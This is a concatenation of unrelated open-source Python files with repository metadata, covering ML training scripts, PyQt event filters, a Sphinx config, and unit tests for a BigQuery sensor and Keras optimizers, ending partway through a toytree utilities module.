logging.info('Testing on dataset %s', dataset_name)
test_iterator = iter(test_dataset)
logging.info('Starting to run eval at epoch: %s', epoch)
test_step(test_iterator, dataset_name)
logging.info('Done with testing on %s', dataset_name)
corrupt_results = {}
if (FLAGS.corruptions_interval > 0 and
(epoch + 1) % FLAGS.corruptions_interval == 0):
corrupt_results = utils.aggregate_corrupt_metrics(
corrupt_metrics, corruption_types, max_intensity,
FLAGS.alexnet_errors_path)
logging.info('Train Loss: %.4f, Accuracy: %.2f%%',
metrics['train/loss'].result(),
metrics['train/accuracy'].result() * 100)
logging.info('Test NLL: %.4f, Accuracy: %.2f%%',
metrics['test/negative_log_likelihood'].result(),
metrics['test/accuracy'].result() * 100)
for i in range(FLAGS.ensemble_size):
logging.info('Member %d Test Loss: %.4f, Accuracy: %.2f%%',
i, metrics['test/nll_member_{}'.format(i)].result(),
metrics['test/accuracy_member_{}'.format(i)].result() * 100)
total_results = {name: metric.result() for name, metric in metrics.items()}
total_results.update(corrupt_results)
# Results from Robustness Metrics themselves return a dict, so flatten them.
total_results = utils.flatten_dictionary(total_results)
with summary_writer.as_default():
for name, result in total_results.items():
tf.summary.scalar(name, result, step=epoch + 1)
for metric in metrics.values():
metric.reset_states()
if (FLAGS.checkpoint_interval > 0 and
(epoch + 1) % FLAGS.checkpoint_interval == 0):
checkpoint_name = checkpoint.save(os.path.join(
FLAGS.output_dir, 'checkpoint'))
logging.info('Saved checkpoint to %s', checkpoint_name)
final_checkpoint_name = checkpoint.save(
os.path.join(FLAGS.output_dir, 'checkpoint'))
logging.info('Saved last checkpoint to %s', final_checkpoint_name)
final_save_name = os.path.join(FLAGS.output_dir, 'model')
model.save(final_save_name)
logging.info('Saved model to %s', final_save_name)
with summary_writer.as_default():
hp.hparams({
'base_learning_rate': FLAGS.base_learning_rate,
'one_minus_momentum': FLAGS.one_minus_momentum,
'l2': FLAGS.l2,
'fast_weight_lr_multiplier': FLAGS.fast_weight_lr_multiplier,
'num_eval_samples': FLAGS.num_eval_samples,
})
if __name__ == '__main__':
app.run(main)
| 44.629126
| 80
| 0.674513
|
4a18e09f4248a6edd27c80f43be471fdf084cac6
| 906
|
py
|
Python
|
imperial/imperial/core/gui/filterReturn.py
|
jorgesaw/imperial
|
ed4d33d1bcc71eb5f497b3cfed52d1fed48b0a7a
|
[
"Unlicense"
] | null | null | null |
imperial/imperial/core/gui/filterReturn.py
|
jorgesaw/imperial
|
ed4d33d1bcc71eb5f497b3cfed52d1fed48b0a7a
|
[
"Unlicense"
] | null | null | null |
imperial/imperial/core/gui/filterReturn.py
|
jorgesaw/imperial
|
ed4d33d1bcc71eb5f497b3cfed52d1fed48b0a7a
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import PyQt4
import PyQt4.QtCore as QtCore
import PyQt4.QtGui as QtGui
class FilterReturn(QtCore.QObject):
def eventFilter(self, source, event):
if (event.type()==QEvent.KeyPress):
key = event.key()
if key==Qt.Key_Return or key==Qt.Key_Enter:
source.emit(SIGNAL("enterPressed()"))
return QtGui.QWidget.eventFilter(self, source, event)
class FilterESC(QtCore.QObject):
def eventFilter(self, source, event):
if (event.type()==QEvent.KeyPress):
key = event.key()
#print('KEY:', key)
#print('ESC:', Qt.Key_Escape)
if key==Qt.Key_Escape:
source.emit(SIGNAL("ESCPressed()"))
return QtGui.QWidget.eventFilter(self, source, event)
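# Illustrative usage sketch (widget and slot names are hypothetical): install
# the filter on a widget and hook the old-style signal it emits, e.g.
#   entry = QtGui.QLineEdit()
#   enter_filter = FilterReturn()
#   entry.installEventFilter(enter_filter)
#   QtCore.QObject.connect(entry, SIGNAL("enterPressed()"), on_enter)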
| 31.241379
| 61
| 0.61479
|
4a18e2df26127f6c931bd0d7d37672a573a3cc12
| 2,309
|
py
|
Python
|
train.py
|
lgchencong/AlexNet
|
6d420d5384c04ba56bb17e84b0a3a3ee2acf99e9
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
lgchencong/AlexNet
|
6d420d5384c04ba56bb17e84b0a3a3ee2acf99e9
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
lgchencong/AlexNet
|
6d420d5384c04ba56bb17e84b0a3a3ee2acf99e9
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from torch import optim
from torchvision import transforms, datasets
from model import AlexNet
from torch.utils.data import DataLoader
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
batch_size = 32
print(device)
data_transform = {
"train": transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
                                 transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]),
"val": transforms.Compose([transforms.Resize((224, 224)), # cannot 224, must (224, 224)
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
}
image_path = 'data/'
print(data_transform["train"])
# The training dataset reuses the "train" pipeline defined in data_transform.
train_datasets = datasets.ImageFolder(root=image_path + 'train', transform=data_transform["train"])
val_datasets = datasets.ImageFolder(root=image_path + 'val', transform=data_transform["val"])
train_loader = DataLoader(train_datasets, batch_size=batch_size, shuffle=True, num_workers=0)
val_loader = DataLoader(val_datasets, batch_size=batch_size, shuffle=True, num_workers=0)
net = AlexNet(num_classes=5, init_weights=True)
net.to(device)
loss_function = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.01)
save_path = './AlexNet.pth'
for epoch in range(3):
# train
    net.train()  # during training, enable the dropout defined in the network
running_loss = 0.0
for step, data in enumerate(train_loader, start=0):
images, labels = data
optimizer.zero_grad()
outputs = net(images.to(device))
loss = loss_function(outputs, labels.to(device))
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
# print train process
rate = (step + 1) / len(train_loader)
a = "*" * int(rate * 50)
b = "." * int((1 - rate) * 50)
print("\rtrain loss: {:^3.0f}%[{}->{}]{:.3f}".format(int(rate * 100), a, b, loss), end="")
| 41.981818
| 99
| 0.61845
|
4a18e32a7c16c0689b21f566639387331abda70e
| 1,072
|
py
|
Python
|
examples/robotchef/docs/source/conf.py
|
pgajdos/lml
|
047bad491a25192d0d3816103b6b47e7374cc5a1
|
[
"BSD-3-Clause"
] | null | null | null |
examples/robotchef/docs/source/conf.py
|
pgajdos/lml
|
047bad491a25192d0d3816103b6b47e7374cc5a1
|
[
"BSD-3-Clause"
] | null | null | null |
examples/robotchef/docs/source/conf.py
|
pgajdos/lml
|
047bad491a25192d0d3816103b6b47e7374cc5a1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
DESCRIPTION = "Sample project to demonstrate load me later plugin system"
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.intersphinx",
"sphinx.ext.viewcode",
]
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = u"robotchef"
copyright = u"2017 Onni Software Ltd."
version = "0.0.1"
release = "0.0.1"
exclude_patterns = []
pygments_style = "sphinx"
html_theme = "default"
html_static_path = ["_static"]
htmlhelp_basename = "robotchefdoc"
latex_elements = {}
latex_documents = [
(
"index",
"robotchef.tex",
"robotchef Documentation",
"Onni Software Ltd.",
"manual",
)
]
man_pages = [
(
"index",
"robotchef",
"robotchef Documentation",
[u"Onni Software Ltd."],
1,
)
]
texinfo_documents = [
(
"index",
"robotchef",
"robotchef Documentation",
"Onni Software Ltd.",
"robotchef",
DESCRIPTION,
"Miscellaneous",
)
]
| 20.226415
| 78
| 0.584888
|
4a18e34095c646354c7d192e1316efb67b1dd64b
| 1,840
|
py
|
Python
|
test/test_user_commons/test_sensor.py
|
MarcinMoskala/biggerquery
|
54bcf1b289854709fc7d430fb8ac347ce84ed7b9
|
[
"Apache-2.0"
] | null | null | null |
test/test_user_commons/test_sensor.py
|
MarcinMoskala/biggerquery
|
54bcf1b289854709fc7d430fb8ac347ce84ed7b9
|
[
"Apache-2.0"
] | null | null | null |
test/test_user_commons/test_sensor.py
|
MarcinMoskala/biggerquery
|
54bcf1b289854709fc7d430fb8ac347ce84ed7b9
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from unittest import main
import pandas as pd
import mock
from biggerquery.user_commons.sensor import sensor_component
YESTERDAY_WHERE_CLAUSE = "DATE(%(partitioning_column)s) = DATE(TIMESTAMP_ADD(TIMESTAMP('{dt} UTC'), INTERVAL -24 HOUR))"
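# Two placeholder styles are mixed on purpose: %(partitioning_column)s is
# filled in by the tests via %-interpolation, while {dt} is left intact for the
# component's own str.format-style datetime substitution at run time.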
def return_table_not_ready(*args, **kwargs):
return pd.DataFrame([{'table_ready': 0}])
def return_table_ready(*args, **kwargs):
return pd.DataFrame([{'table_ready': 1}])
class SensorComponentTestCase(TestCase):
def test_should_generate_component_name_based_on_table_alias(self):
# given
dataset = mock.Mock()
sensor = sensor_component('some_table', YESTERDAY_WHERE_CLAUSE, ds=dataset)
# expect
self.assertEqual(sensor._standard_component.__name__, 'wait_for_some_table')
def test_should_raise_error_when_query_result_is_empty(self):
# given
dataset = mock.Mock()
dataset.collect.side_effect = return_table_not_ready
sensor = sensor_component('some_table', YESTERDAY_WHERE_CLAUSE, ds=dataset)
# expect
with self.assertRaises(ValueError):
sensor(ds=dataset)
def test_should_generate_query_based_on_where_clause_and_table_alias(self):
# given
dataset = mock.Mock()
sensor = sensor_component('some_table', YESTERDAY_WHERE_CLAUSE % {
'partitioning_column': 'partition'
}, ds=dataset)
dataset.collect.side_effect = return_table_ready
# when
sensor(ds=dataset)
# then
dataset.collect.assert_called_once_with(sql='''
SELECT count(*) > 0 as table_ready
FROM `{some_table}`
WHERE DATE(partition) = DATE(TIMESTAMP_ADD(TIMESTAMP('{dt} UTC'), INTERVAL -24 HOUR))
''', custom_run_datetime=None)
if __name__ == '__main__':
main()
| 31.724138
| 120
| 0.691304
|
4a18e36e1dd053c07c244872f560fcda82f4e797
| 972
|
py
|
Python
|
fixture/application.py
|
fastmelodic/PythonQA
|
964ed27d812a2f4927784d18e4d44c86fac43ac9
|
[
"Apache-2.0"
] | null | null | null |
fixture/application.py
|
fastmelodic/PythonQA
|
964ed27d812a2f4927784d18e4d44c86fac43ac9
|
[
"Apache-2.0"
] | null | null | null |
fixture/application.py
|
fastmelodic/PythonQA
|
964ed27d812a2f4927784d18e4d44c86fac43ac9
|
[
"Apache-2.0"
] | null | null | null |
from selenium import webdriver
from fixture.session import SessionHelper
from fixture.group import GroupHelper
from fixture.contact import ContactHelper
class Application:
def __init__(self, browser, baseurl):
if browser == "firefox":
self.wd = webdriver.Firefox()
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.wd.implicitly_wait(1)
self.session = SessionHelper(self)
self.group = GroupHelper(self)
self.contact = ContactHelper(self)
self.baseurl = baseurl
def is_valid(self):
try:
self.wd.current_url
return True
        except Exception:
return False
def enter_home_page(self):
wd = self.wd
wd.get(self.baseurl)
def destroy(self):
self.wd.quit()
| 27
| 65
| 0.599794
|
4a18e4a6111d89ab085e6daaefa074833979815d
| 18,116
|
py
|
Python
|
keras/optimizers/optimizer_experimental/optimizer_test.py
|
hdubbs/keras
|
4967ce6f8f0199969ba40d74eba1bddc204ca100
|
[
"Apache-2.0"
] | null | null | null |
keras/optimizers/optimizer_experimental/optimizer_test.py
|
hdubbs/keras
|
4967ce6f8f0199969ba40d74eba1bddc204ca100
|
[
"Apache-2.0"
] | null | null | null |
keras/optimizers/optimizer_experimental/optimizer_test.py
|
hdubbs/keras
|
4967ce6f8f0199969ba40d74eba1bddc204ca100
|
[
"Apache-2.0"
] | null | null | null |
"""Tests for the reworked optimizer.
More context in go/new-keras-optimizer
"""
import os
import re
from absl import logging
from absl.testing import parameterized
import keras
from keras.optimizers import learning_rate_schedule
from keras.optimizers.optimizer_experimental import adadelta as adadelta_new
from keras.optimizers.optimizer_experimental import adagrad as adagrad_new
from keras.optimizers.optimizer_experimental import adam as adam_new
from keras.optimizers.optimizer_experimental import adamw as adamw_new
from keras.optimizers.optimizer_experimental import rmsprop as rmsprop_new
from keras.optimizers.optimizer_experimental import sgd as sgd_new
from keras.optimizers.optimizer_v2 import adadelta as adadelta_old
from keras.optimizers.optimizer_v2 import adagrad as adagrad_old
from keras.optimizers.optimizer_v2 import adam as adam_old
from keras.optimizers.optimizer_v2 import gradient_descent as sgd_old
from keras.optimizers.optimizer_v2 import rmsprop as rmsprop_old
from keras.utils import losses_utils
import numpy as np
import tensorflow.compat.v2 as tf
ds_combinations = tf.__internal__.distribute.combinations
STRATEGIES = [
# TODO(b/202992598): Add PSS strategy once the XLA issues is resolved.
ds_combinations.one_device_strategy,
ds_combinations.mirrored_strategy_with_cpu_1_and_2,
ds_combinations.mirrored_strategy_with_two_gpus,
ds_combinations.tpu_strategy,
ds_combinations.cloud_tpu_strategy,
ds_combinations.multi_worker_mirrored_2x1_cpu,
ds_combinations.multi_worker_mirrored_2x2_gpu,
ds_combinations.central_storage_strategy_with_two_gpus,
]
adadelta_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladadelta",
lambda: adadelta_new.Adadelta( # pylint: disable=g-long-lambda
0.002,
use_ema=True,
ema_overwrite_frequency=None))
adagrad_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladagrad", lambda: adagrad_new.Adagrad(0.002))
adam_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladam", lambda: adam_new.Adam(0.002))
adamw_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladamw", lambda: adamw_new.AdamW(0.002, weight_decay=0.004))
rmsprop_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentalrmsprop", lambda: rmsprop_new.RMSprop(0.002))
sgd_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentalsgdaverage",
lambda: sgd_new.SGD( # pylint: disable=g-long-lambda
0.002,
use_ema=True,
ema_overwrite_frequency=1))
OPTIMIZER_FN = [
adadelta_new_fn,
adagrad_new_fn,
adam_new_fn,
adamw_new_fn,
rmsprop_new_fn,
sgd_new_fn,
]
class OptimizerFunctionalityTest(tf.test.TestCase, parameterized.TestCase):
  """Test the functionality of the optimizer."""
def testAddVariableFromReference(self):
optimizer = adam_new.Adam()
variable = optimizer.add_variable_from_reference(
tf.Variable(1.0, name="tmp"), "test")
self.assertEqual(variable._shared_name, "test/tmp")
self.assertEqual(self.evaluate(variable), 0)
def testBuildIndexDict(self):
optimizer = adam_new.Adam()
var_list = [tf.Variable(0, name=f"var{i}") for i in range(10)]
optimizer._build_index_dict(var_list)
self.assertEqual(optimizer._index_dict[optimizer._var_key(var_list[7])], 7)
def testClipNorm(self):
optimizer = adam_new.Adam(clipnorm=1)
grad = [tf.convert_to_tensor([100.0, 100.0])]
clipped_grad = optimizer._clip_gradients(grad)
self.assertAllClose(clipped_grad[0], [2**0.5 / 2, 2**0.5 / 2])
def testClipValue(self):
optimizer = adam_new.Adam(clipvalue=1)
grad = [tf.convert_to_tensor([100.0, 100.0])]
clipped_grad = optimizer._clip_gradients(grad)
self.assertAllEqual(clipped_grad[0], [1.0, 1.0])
def testClipGlobalNorm(self):
optimizer = adam_new.Adam(global_clipnorm=1)
grad = [
tf.cast([100.0, 100.0], dtype=tf.float32),
tf.cast([100.0, 100.0], dtype=tf.float32)
]
clipped_grad = optimizer._clip_gradients(grad)
self.assertAllClose(clipped_grad[0], [0.5, 0.5])
def testPassingLegacyArgsRaiseWarning(self):
with self.assertLogs(level="WARNING") as log_output:
logging.set_verbosity(logging.WARNING)
_ = adam_new.Adam(clipnorm=1, decay=0.5)
expected_log = "decay is deprecated in"
output = log_output[0][0].message
self.assertTrue(re.search(expected_log, output))
def testPassingLegacyClipnorm(self):
optimizer = adam_new.Adam(clipnorm=1)
self.assertEqual(optimizer._clipnorm, 1)
def testReturnAllOptimizerVariables(self):
x = tf.Variable([[1.0, 2.0], [3.0, 4.0]], dtype=tf.float32)
optimizer = adam_new.Adam()
grads = tf.convert_to_tensor([[1.0, 2.0], [3.0, 4.0]])
optimizer.apply_gradients(zip([grads], [x]))
optimizer_variables = optimizer.variables
all_names = [var._shared_name for var in optimizer_variables]
self.assertLen(optimizer_variables, 4)
self.assertCountEqual(
all_names,
["iteration", "learning_rate", "Adam/m/Variable", "Adam/v/Variable"])
def testSetLearningRate(self):
optimizer = adam_new.Adam(learning_rate=1.0)
self.assertIsInstance(optimizer._learning_rate, tf.Variable)
self.assertEqual(self.evaluate(optimizer.learning_rate), 1.0)
optimizer.learning_rate = 2.0
self.assertEqual(self.evaluate(optimizer.learning_rate), 2.0)
# Test the legacy setter.
optimizer.lr = 3.0
self.assertEqual(self.evaluate(optimizer.learning_rate), 3.0)
lr_schedule = learning_rate_schedule.ExponentialDecay(
initial_learning_rate=1e-2, decay_steps=10000, decay_rate=0.9)
optimizer = adam_new.Adam(learning_rate=lr_schedule)
self.assertIsInstance(optimizer._learning_rate,
learning_rate_schedule.ExponentialDecay)
self.assertEqual(optimizer.learning_rate, 0.01)
# Test the legacy property.
self.assertEqual(optimizer.lr, 0.01)
x = tf.Variable([1.0, 2.0], dtype=tf.float32)
grads = tf.convert_to_tensor([1.0, 2.0])
for _ in range(2):
optimizer.apply_gradients(zip([grads], [x]))
self.assertTrue(optimizer.learning_rate < 0.01 and
optimizer.learning_rate > 0.00999)
with self.assertRaisesRegex(TypeError, "This optimizer was created with*"):
optimizer.learning_rate = 2.0
def testSetIterations(self):
optimizer = adam_new.Adam()
optimizer.iterations = tf.Variable(2, dtype=tf.int32)
self.assertEqual(optimizer.iterations, 2)
var_list = [tf.Variable(2.0), tf.Variable(2.0)]
grads = tf.convert_to_tensor([1.0, 1.0])
optimizer.apply_gradients(zip(grads, var_list))
self.assertEqual(optimizer.iterations, 3)
with self.assertRaisesRegex(RuntimeError, "Cannot set*"):
optimizer.iterations = 2
def testPassingMissingWDError(self):
with self.assertRaises(ValueError):
_ = adamw_new.AdamW(0.01, weight_decay=None)
with self.assertRaisesRegex(ValueError, "Missing value of"):
_ = adamw_new.AdamW(0.01, weight_decay=None)
def testMovingAverageOptimizer(self):
optimizer = sgd_new.SGD(
learning_rate=1,
use_ema=True,
ema_momentum=0.5,
ema_overwrite_frequency=3)
var1, var2 = tf.Variable(2.0), tf.Variable(2.0)
with tf.GradientTape() as tape:
loss = var1 + var2
grads = tape.gradient(loss, [var1, var2])
# First iteration: [var1, var2] = [1.0, 1.0]
optimizer.apply_gradients(zip(grads, [var1, var2]))
self.assertAllEqual([var1.numpy(), var2.numpy()], [1.0, 1.0])
# Second iteration: [var1, var2] = [0.0, 0.0]
optimizer.apply_gradients(zip(grads, [var1, var2]))
self.assertAllEqual([var1.numpy(), var2.numpy()], [0.0, 0.0])
# Third iteration, without EMA, we should see [var1, var2] = [-1.0, -1.0],
# but overwriting results in [var1, var2] = [-0.125, -0.125].
optimizer.apply_gradients(zip(grads, [var1, var2]))
self.assertAllEqual([var1.numpy(), var2.numpy()], [-0.125, -0.125])
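    # Worked arithmetic for the overwrite above (a sketch assuming the EMA
    # buffer starts at the variable's initial value of 2.0 and updates as
    # ema = 0.5 * ema + 0.5 * var, since ema_momentum=0.5):
    #   step 1: var = 1.0,  ema = 0.5 * 2.0  + 0.5 * 1.0    = 1.5
    #   step 2: var = 0.0,  ema = 0.5 * 1.5  + 0.5 * 0.0    = 0.75
    #   step 3: var = -1.0, ema = 0.5 * 0.75 + 0.5 * (-1.0) = -0.125
    # Because ema_overwrite_frequency=3, step 3 overwrites var with -0.125.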
def testGetAndFromConfig(self):
optimizer = adam_new.Adam(
learning_rate=np.float64(0.05),
beta_1=0.7,
beta_2=0.77,
amsgrad=True,
epsilon=0.001,
clipnorm=0.5,
use_ema=True,
ema_momentum=0.5,
ema_overwrite_frequency=50)
config = optimizer.get_config()
self.assertDictEqual(
config, {
"learning_rate": np.float32(0.05),
"beta_1": 0.7,
"beta_2": 0.77,
"epsilon": 0.001,
"amsgrad": True,
"clipnorm": 0.5,
"global_clipnorm": None,
"clipvalue": None,
"use_ema": True,
"ema_momentum": 0.5,
"ema_overwrite_frequency": 50,
"jit_compile": False,
})
restored_optimizer = adam_new.Adam.from_config(config)
self.assertDictEqual(restored_optimizer.get_config(),
optimizer.get_config())
def testCheckpointOptimizer(self):
x = tf.Variable([[1.0, 2.0], [3.0, 4.0]], dtype=tf.float32)
lr_schedule = learning_rate_schedule.ExponentialDecay(
initial_learning_rate=1e-2, decay_steps=10000, decay_rate=0.9)
optimizer_1 = adam_new.Adam(
learning_rate=lr_schedule, beta_1=0.8, beta_2=0.888)
grads = tf.convert_to_tensor([[1.0, 2.0], [3.0, 4.0]])
for _ in range(1):
optimizer_1.apply_gradients(zip([grads], [x]))
# Then save the variable and optimizer to a checkpoint.
checkpoint_1 = tf.train.Checkpoint(var=x, optimizer=optimizer_1)
checkpoint_path = checkpoint_1.save(self.get_temp_dir())
# Create a new optimizer and call restore on it (and x)
x2 = tf.Variable([[0., 0.], [0., 0.]], dtype=x.dtype)
optimizer_2 = adam_new.Adam(learning_rate=0.02, beta_1=0.7, beta_2=0.777)
optimizer_2.build([x2])
checkpoint_2 = tf.train.Checkpoint(var=x2, optimizer=optimizer_2)
checkpoint_2.restore(checkpoint_path)
    self.assertAllEqual(
        self.evaluate(optimizer_1._momentums._storage[0]),
        self.evaluate(optimizer_2._momentums._storage[0]))
self.assertEqual(
self.evaluate(optimizer_1._iterations),
self.evaluate(optimizer_2._iterations))
@parameterized.product(optimizer_fn=OPTIMIZER_FN)
def testSaveAndLoadOptimizerWithModel(self, optimizer_fn):
model = keras.Sequential(
[keras.layers.Input(shape=(1,)),
keras.layers.Dense(1)])
optimizer = optimizer_fn()
optimizer._clipnorm = 0.1
x = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
y = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
model.compile(loss="mse", optimizer=optimizer)
model.fit(x, y)
# Save in h5 format.
path = os.path.join(self.get_temp_dir(), "model.h5")
model.save(path)
loaded_model = keras.models.load_model(path)
loaded_model.load_weights(path)
loaded_optimizer = loaded_model.optimizer
self.assertEqual(type(optimizer), type(loaded_optimizer))
self.assertEqual(loaded_optimizer.learning_rate, 0.002)
self.assertEqual(loaded_optimizer._clipnorm, 0.1)
# Save in Keras SavedModel format.
model.fit(x, y)
path = os.path.join(self.get_temp_dir(), "model")
model.save(path)
loaded_model = keras.models.load_model(path)
loaded_model.load_weights(path)
loaded_optimizer = loaded_model.optimizer
self.assertEqual(type(optimizer), type(loaded_optimizer))
self.assertEqual(loaded_optimizer.learning_rate, 0.002)
self.assertEqual(loaded_optimizer._clipnorm, 0.1)
class OptimizerRegressionTest(tf.test.TestCase, parameterized.TestCase):
"""Test optimizer outputs the same numerical results as optimizer_v2."""
def _compare_numerical(self, old_optimizer, new_optimizer):
x1 = tf.Variable(np.ones([10]), dtype=tf.float64)
x2 = tf.Variable(np.ones([10]), dtype=tf.float64)
grads = tf.convert_to_tensor(np.arange(0.1, 1.1, 0.1))
sparse_grads = tf.IndexedSlices(
tf.convert_to_tensor([0, 0.2, 0.4, 0.8], dtype=tf.float64),
[0, 2, 4, 6],
dense_shape=[len(grads)])
for _ in range(5):
self.assertAllClose(x1, x2)
old_optimizer.apply_gradients(zip([grads], [x1]))
new_optimizer.apply_gradients(zip([grads], [x2]))
for _ in range(5):
self.assertAllClose(x1, x2)
old_optimizer.apply_gradients(zip([sparse_grads], [x1]))
new_optimizer.apply_gradients(zip([sparse_grads], [x2]))
def testAdam(self):
self._compare_numerical(
adam_old.Adam(amsgrad=True), adam_new.Adam(amsgrad=True))
def testAdadelta(self):
self._compare_numerical(adadelta_old.Adadelta(), adadelta_new.Adadelta())
def testAdagrad(self):
self._compare_numerical(adagrad_old.Adagrad(), adagrad_new.Adagrad())
def testRMSprop(self):
    self._compare_numerical(rmsprop_old.RMSprop(), rmsprop_new.RMSprop())
@parameterized.product(nesterov=[True, False])
def testSgd(self, nesterov):
    self._compare_numerical(
        sgd_old.SGD(nesterov=nesterov), sgd_new.SGD(nesterov=nesterov))
class DistributedTrainingTest(tf.test.TestCase, parameterized.TestCase):
@ds_combinations.generate(
tf.__internal__.test.combinations.combine(
strategy=STRATEGIES, optimizer_fn=OPTIMIZER_FN))
def testGetGradientsInModel(self, strategy, optimizer_fn):
with strategy.scope():
model = keras.Sequential(
[keras.layers.Input(shape=(1,)),
keras.layers.Dense(1)])
optimizer = optimizer_fn()
x = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
y = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
model.compile(loss="mse", optimizer=optimizer)
model.fit(x, y, epochs=1, steps_per_epoch=5)
if optimizer._name == "Adam":
# Assert the momentum variable is not 0.
self.assertNotEqual(self.evaluate(optimizer._momentums._storage[0]), 0)
elif optimizer._name == "Adadelta":
# Assert the accumulated variable is not 0.
self.assertNotEqual(
self.evaluate(optimizer._accumulated_grads._storage[0]), 0)
elif optimizer._name == "Adagrad":
# Assert the accumulated variable is not 0.
self.assertNotEqual(self.evaluate(optimizer._accumulators._storage[0]), 0)
@ds_combinations.generate(
tf.__internal__.test.combinations.combine(
strategy=STRATEGIES, optimizer_fn=OPTIMIZER_FN))
def testGetGradientsInCustomTrainingLoop(self, strategy, optimizer_fn):
with strategy.scope():
model = keras.Sequential(
[keras.layers.Input(shape=(1,)),
keras.layers.Dense(1)])
optimizer = optimizer_fn()
def per_worker_dataset_fn():
def dataset_fn(_):
x, y = [1, 1, 1, 0, 0, 0], [1, 1, 1, 0, 0, 0]
ds = tf.data.Dataset.from_tensor_slices((x, y))
ds = ds.repeat().batch(6)
return ds
return strategy.distribute_datasets_from_function(dataset_fn)
ds = per_worker_dataset_fn()
@tf.function
def train_step(ds):
def replica_fn(data):
features, labels = data
with tf.GradientTape() as tape:
output = model(tf.expand_dims(features, axis=1))
loss = keras.losses.MeanSquaredError(
reduction=losses_utils.ReductionV2.NONE)(labels, output)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
strategy.run(replica_fn, args=(next(iter(ds)),))
for _ in range(3):
train_step(ds)
self.assertEqual(self.evaluate(optimizer.iterations), 3)
@ds_combinations.generate(
tf.__internal__.test.combinations.combine(strategy=[
ds_combinations.mirrored_strategy_with_two_gpus,
ds_combinations.tpu_strategy,
ds_combinations.multi_worker_mirrored_2x2_gpu,
ds_combinations.central_storage_strategy_with_two_gpus,
]))
def testJitCompile(self, strategy):
    # Test that the optimizer yields the same numerical results whether
    # jit_compile is on or off.
with strategy.scope():
optimizer_1 = adam_new.Adam(use_ema=True, ema_overwrite_frequency=1)
optimizer_2 = adam_new.Adam(
jit_compile=True, use_ema=True, ema_overwrite_frequency=1)
model_1 = keras.Sequential([
keras.layers.Input(shape=(2,)),
keras.layers.Dense(5),
keras.layers.Dense(1)
])
model_2 = keras.models.clone_model(model_1)
model_2.set_weights(model_1.get_weights())
def per_worker_dataset_fn():
def dataset_fn(_):
x = np.random.rand(6, 2)
y = [1, 1, 1, 0, 0, 0]
ds = tf.data.Dataset.from_tensor_slices((x, y))
ds = ds.repeat().batch(6)
return ds
return strategy.distribute_datasets_from_function(dataset_fn)
ds = per_worker_dataset_fn()
@tf.function
def train_step(ds):
def replica_fn(data):
features, labels = data
with tf.GradientTape() as tape:
output_1 = model_1(features)
loss_1 = keras.losses.MeanSquaredError(
reduction=losses_utils.ReductionV2.NONE)(labels, output_1)
grads_1 = tape.gradient(loss_1, model_1.trainable_variables)
optimizer_1.apply_gradients(zip(grads_1, model_1.trainable_variables))
with tf.GradientTape() as tape:
output_2 = model_2(features)
loss_2 = keras.losses.MeanSquaredError(
reduction=losses_utils.ReductionV2.NONE)(labels, output_2)
grads_2 = tape.gradient(loss_2, model_2.trainable_variables)
optimizer_2.apply_gradients(zip(grads_2, model_2.trainable_variables))
strategy.run(replica_fn, args=(next(iter(ds)),))
for _ in range(3):
train_step(ds)
self.assertAllClose(model_1.trainable_variables[0][0],
model_2.trainable_variables[0][0])
if __name__ == "__main__":
tf.__internal__.distribute.multi_process_runner.test_main()
| 38.544681
| 80
| 0.690991
|
4a18e59bcd86169a0ab3d6496797d913e0b698e1
| 10,195
|
py
|
Python
|
toytree/utils.py
|
PhilippineDubertrand/toytree
|
cdb57fae164f0035dc5f451e08289780deae927a
|
[
"BSD-3-Clause"
] | null | null | null |
toytree/utils.py
|
PhilippineDubertrand/toytree
|
cdb57fae164f0035dc5f451e08289780deae927a
|
[
"BSD-3-Clause"
] | null | null | null |
toytree/utils.py
|
PhilippineDubertrand/toytree
|
cdb57fae164f0035dc5f451e08289780deae927a
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function, division, absolute_import
import re
from copy import deepcopy
import numpy as np
#######################################################
# Exception Classes
#######################################################
class ToytreeError(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class TreeError(Exception):
"A problem occurred during a TreeNode operation"
def __init__(self, value=''):
self.value = value
def __str__(self):
return repr(self.value)
# TREE FORMATS
NW_FORMAT = {
# flexible with support
# Format 0 = (A:0.35,(B:0.72,(D:0.60,G:0.12)1.00:0.64)1.00:0.56);
0: [
('name', str, True),
('dist', float, True),
('support', float, True),
('dist', float, True),
],
# flexible with internal node names
# Format 1 = (A:0.35,(B:0.72,(D:0.60,G:0.12)E:0.64)C:0.56);
1: [
('name', str, True),
('dist', float, True),
('name', str, True),
